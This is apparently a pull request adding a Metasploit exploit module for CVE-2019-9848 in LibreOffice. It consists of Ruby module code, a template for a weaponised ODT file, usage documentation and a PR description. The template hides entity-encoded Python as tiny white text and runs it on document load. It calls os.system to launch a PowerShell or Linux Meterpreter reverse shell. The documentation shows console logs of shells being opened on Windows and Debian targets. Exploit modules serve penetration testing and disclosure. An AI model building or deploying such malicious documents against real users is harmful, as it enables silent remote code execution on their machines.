### PR TITLE
Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848)

### DIFF
--- a/data/exploits/CVE-2019-9848/librefile.erb
+++ b/data/exploits/CVE-2019-9848/librefile.erb
@@ -1,0 +1,42 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners></office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text" fo:color="#ffffff"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="20%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+  <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Preformatted_20_Text"><style:text-properties fo:color="#ffffff" fo:font-size="2pt" officeooo:rsid="00443c94" officeooo:paragraph-rsid="00443c94" style:font-size-asian="2pt" style:font-size-complex="2pt"/></style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
+  <text:p text:style-name="Standard">#<%= text_content %></text:p>
+  </office:text>
+ </office:body>
+</office:document>

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -11,7 +11,7 @@
   The generated document file contains a one-liner python code that calls `os.system`: 
 
   ```python
-  getattr(__import__(“os”),“system”)(“<%= @cmd %>”)
+  getattr(__import__("os"),"system")("<%= @cmd %>")
   ```
 
   but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -14,17 +14,23 @@
   getattr(__import__(“os”),“system”)(“<%= @cmd %>”)
   ```
 
-  but encoded :
+  but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :
 
   ```xml
   <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
   ```
 
-  To avoid any python error, the `h1` title written in the document is a python comment `#`.
+  To avoid any python error, the h1 title written in the document is a python comment `#`.
 
 ## Vulnerable Application
 
   LibreOffice version 6.2.5 and prior.
+
+  This module has been tested successfully with:
+
+  * LibreOffice 6.2.4 on Windows 7
+  * LibreOffice 6.2.5 on Windows 7
+  * LibreOffice 6.2.4 on Debian 9.9
 
 ## Verification Steps
 
@@ -41,7 +47,7 @@
 
 ## Scenarios
 
-### Tested on LibreOffice 6.2.4 running Windows 7
+### LibreOffice 6.2.4 on Windows 7
 
   ```
   msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
@@ -64,7 +70,7 @@
   meterpreter > 
   ```
 
-### Tested on LibreOffice 6.2.4 on Debian 9.9
+### LibreOffice 6.2.4 on Debian 9.9
 
   ```
   msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -64,7 +64,7 @@
   meterpreter > 
   ```
 
-### Tested on LibreOffice 6.2.4 running Debian 9.9
+### Tested on LibreOffice 6.2.4 on Debian 9.9
 
   ```
   msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -20,7 +20,7 @@
   <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
   ```
 
-  To avoid any python error, the h1 title written in the document is a python comment `#`.
+  To avoid any python error, the `h1` title written in the document is a python comment `#`.
 
 ## Vulnerable Application
 

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -24,7 +24,7 @@
 
 ## Vulnerable Application
 
-  "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.
+  LibreOffice version 6.2.5 and prior.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -8,7 +8,7 @@
 
   This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
 
-  The generated document file contains a one-liner python code that does an os.system : 
+  The generated document file contains a one-liner python code that calls `os.system`: 
 
   ```python
   getattr(__import__(“os”),“system”)(“<%= @cmd %>”)

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -2,9 +2,11 @@
 
   This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.
 
-  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 
+  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 
 
-  This module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
+  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 
+
+  This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
 
   The generated document file contains a one-liner python code that does an os.system : 
 

--- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
@@ -1,0 +1,88 @@
+## Description
+
+  This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.
+
+  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 
+
+  This module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
+
+  The generated document file contains a one-liner python code that does an os.system : 
+
+  ```python
+  getattr(__import__(“os”),“system”)(“<%= @cmd %>”)
+  ```
+
+  but encoded :
+
+  ```xml
+  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
+  ```
+
+  To avoid any python error, the h1 title written in the document is a python comment `#`.
+
+## Vulnerable Application
+
+  "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
+  4. Do: ```set LHOST <ip>```
+  5. Do: ```set LPORT <port>```
+  6. Do: ```run```
+  7. Move the generated file to the target
+  8. Start a handler
+  9. Open the file with a vulnerable version of LibreOffice
+ 10. You should get a shell.
+
+## Scenarios
+
+### Tested on LibreOffice 6.2.4 running Windows 7
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
+  lhost => 192.168.33.1
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run
+
+  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.33.1
+  lhost => 192.168.33.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.33.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.33.102
+  [*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400
+
+  meterpreter > 
+  ```
+
+### Tested on LibreOffice 6.2.4 running Debian 9.9
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
+  lhost => 192.168.33.1
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run
+
+  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.33.1
+  lhost => 192.168.33.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.33.1:4444 
+  [*] Sending stage (985320 bytes) to 192.168.33.117
+  [*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400
+
+  meterpreter > getuid
+  Server username: uid=1001, gid=1001, euid=1001, egid=1001
+  meterpreter > 
+  ```

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        =>  'win',
               'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'payload'         =>  'windows/meterpreter/reverse_tcp',
+              'Payload'         =>  'windows/meterpreter/reverse_tcp',
               'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
             }
           ],
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        =>  'linux',
               'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'payload'         =>  'linux/x86/meterpreter/reverse_tcp',
+              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
               'DefaultOptions'  =>  { 'PrependFork' =>  true },
               'CmdStagerFlavor' =>  'printf',
             }
@@ -64,7 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
     [
-      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
+      OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
     ])
   end
 
@@ -90,20 +91,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_file()
-    text_content = 'My Report'
+    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
     encode_cmd
 
     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
     libre_file = ERB.new(fodt_file).result(binding())
+
+    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")
+
     libre_file
   rescue Errno::ENOENT
     fail_with(Failure::NotFound, 'Cannot find template file')
   end
 
   def exploit
-    if datastore['TARGET'] == 0
+    if target.name == 'Windows'
       gen_windows_cmd
-    elsif datastore['TARGET'] == 1
+    elsif target.name == 'Linux'
       gen_linux_cmd
     else
       fail_with(Failure::BadConfig, 'A formal target was not chosen.')

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_file()
-    text_content = "My Report"
+    text_content = 'My Report'
     encode_cmd
 
     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'LibreOffice Macro Python Code Execution',
       'Description'    => %q{
         LibreOffice comes bundled with sample macros written in Python and
-        allows the ability to bind program events to them. 
+        allows the ability to bind program events to them.
 
         LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
 
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DisclosureDate'  =>  "2019-07-16", 
+      'DisclosureDate'  =>  "2019-07-16",
       'DefaultTarget'   =>  0
     ))
 
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
     ])
   end
-  
+
   def encode_cmd
     @cmd = Rex::Text.html_encode(@cmd)
     @cmd = @cmd.gsub("&#x41;", "\\x41")
@@ -88,11 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote
     @cmd = @cmd.gsub!("\\", "\\\\\\")
     @cmd = @cmd.gsub!("'", "\"")
   end
-  
+
   def gen_file()
     text_content = "My Report"
     encode_cmd
-	
+
     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
     libre_file = ERB.new(fodt_file).result(binding())
     libre_file

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -1,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreOffice Macro Python Code Execution',
+      'Description'    => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them. 
+
+        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
+
+        This module generates an ODT file with a dom loaded event that,
+        when triggered, will execute arbitrary python code and the metasploit payload.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nils Emmerich',    # Vulnerability discovery and PoC
+        'Shelby Pace',      # Based on this module (exploiting CVE-2018-16858)
+        'LoadLow'           # This msf module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', 'CVE-2019-9848' ],
+          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
+        ],
+     'Platform'       => [ 'win', 'linux' ],
+     'Arch'           => [ ARCH_X86, ARCH_X64 ],
+     'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        =>  'win',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'payload'         =>  'windows/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'payload'         =>  'linux/x86/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependFork' =>  true },
+              'CmdStagerFlavor' =>  'printf',
+            }
+          ]
+        ],
+      'DisclosureDate'  =>  "July 16, 2019", 
+      'DefaultTarget'   =>  0
+    ))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
+    ])
+  end
+  
+  def encode_cmd
+    @cmd = Rex::Text.html_encode(@cmd)
+    @cmd = @cmd.gsub("&#x41;", "\\x41")
+  end
+
+  def gen_windows_cmd
+    opts =
+    {
+      :remove_comspec       =>  true,
+      :method               =>  'reflection',
+      :encode_final_payload =>  true
+    }
+    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
+  end
+
+  def gen_linux_cmd
+    @cmd = generate_cmdstager.first
+    @cmd = @cmd.gsub!("\\", "\\\\\\")
+    @cmd = @cmd.gsub!("'", "\"")
+  end
+  
+  def gen_file()
+    text_content = "My Report"
+    encode_cmd
+	
+    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
+    libre_file = ERB.new(fodt_file).result(binding())
+    libre_file
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'Cannot find template file')
+  end
+
+  def exploit
+    if datastore['TARGET'] == 0
+      gen_windows_cmd
+    elsif datastore['TARGET'] == 1
+      gen_linux_cmd
+    else
+      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
+    end
+    fodt_file = gen_file
+
+    file_create(fodt_file)
+  end
+end

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'References'     =>
         [
-          [ 'CVE', 'CVE-2019-9848' ],
+          [ 'CVE', '2019-9848' ],
           [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
         ],
      'Platform'       => [ 'win', 'linux' ],
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DisclosureDate'  =>  "July 16, 2019", 
+      'DisclosureDate'  =>  "2019-07-16", 
       'DefaultTarget'   =>  0
     ))
 


### PR DESCRIPTION
It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the odt file with a vulnerable LibreOffice (in comparison to the original PoC). 

[Original PoC from Nils Emmerich](https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/)

## Description

  This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 

  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 

  This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

  The generated document file contains a one-liner python code that calls `os.system`: 

  ```python
  getattr(__import__("os"),"system")("<%= @cmd %>")
  ```

  but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :

  ```xml
  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
  ```

  To avoid any python error, the `h1` title written in the document is a python comment `#`.

## Vulnerable Application

  LibreOffice version 6.2.5 and prior.

  This module has been tested successfully with:

  * LibreOffice 6.2.4 on Windows 7
  * LibreOffice 6.2.5 on Windows 7
  * LibreOffice 6.2.4 on Debian 9.9

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
  4. Do: ```set LHOST <ip>```
  5. Do: ```set LPORT <port>```
  6. Do: ```run```
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
 10. You should get a shell.

## Scenarios

### LibreOffice 6.2.4 on Windows 7

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.33.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.33.102
  [*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

  meterpreter > 
  ```

### LibreOffice 6.2.4 on Debian 9.9

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
  payload => linux/x86/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.33.1:4444 
  [*] Sending stage (985320 bytes) to 192.168.33.117
  [*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

  meterpreter > getuid
  Server username: uid=1001, gid=1001, euid=1001, egid=1001
  meterpreter > 
  ```